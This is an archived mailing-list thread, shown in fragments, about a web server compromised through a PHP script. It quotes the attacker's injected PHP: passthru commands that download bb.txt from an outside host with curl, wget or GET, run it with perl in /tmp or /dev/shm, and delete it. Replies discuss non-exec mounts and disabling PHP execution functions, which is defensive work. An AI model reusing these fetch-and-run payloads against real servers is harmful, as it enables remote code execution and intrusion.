Hi folks
I found the issue, it is one of the php script allowing the
remote script to run.
and the remote script is something like:
http://www.radiovirtual.org/bb.txt;perl
bb.txt;rm -f bb.txt*');
passthru('cd /tmp;curl -o bb.txt
http://www.radiovirtual.org/bb.txt;perl bb.txt;rm -f
On Jan 3, 2008 6:18 PM, Mike Wang <[EMAIL PROTECTED]> wrote:
> Hi folks
[snip]
> http://www.radiovirtual.org/bb.txt > bb.txt;perl bb.txt;rm -f bb.txt*');
> passthru('cd /dev/shm;GET http://www.radiovirtual.org/bb.txt
> > bb.txt;perl bb.txt;rm -f bb.txt*');
> passthru('id');
> ?>
>
> the /tmp wa
Hi Luis
You are abosulutely right!!
Just tried a test script at /tmp, it is running. So there is not
much point to mount the /tmp /dev/shm as non-exec.
My misunderstanding of non-exec has been there for a while. :(
thanks a lot.
Mike
On Jan 3, 2008 8:55 PM, Luis Mondesi <[EMAIL PR
Quoting Luis Mondesi ([EMAIL PROTECTED]):
> It's time to tell PHP (via php.ini) not to allow any of those
> functions that allow executing stuff from the system (system,
> passthru, whatever).
Amen to that. Good starting point:
disable_functions = system, exec, passthru, popen, escapeshellcmd,
In article <[EMAIL PROTECTED]> you wrote:
> I found the issue, it is one of the php script allowing the
> remote script to run.
This is a typical Apache exploit where remote fileuploads are possible.
> passthru('cd /tmp;wget http://www.radiovirtual.org/bb.txt;perl
> bb.txt;rm -f bb.txt*');
5 matches
Mail list logo
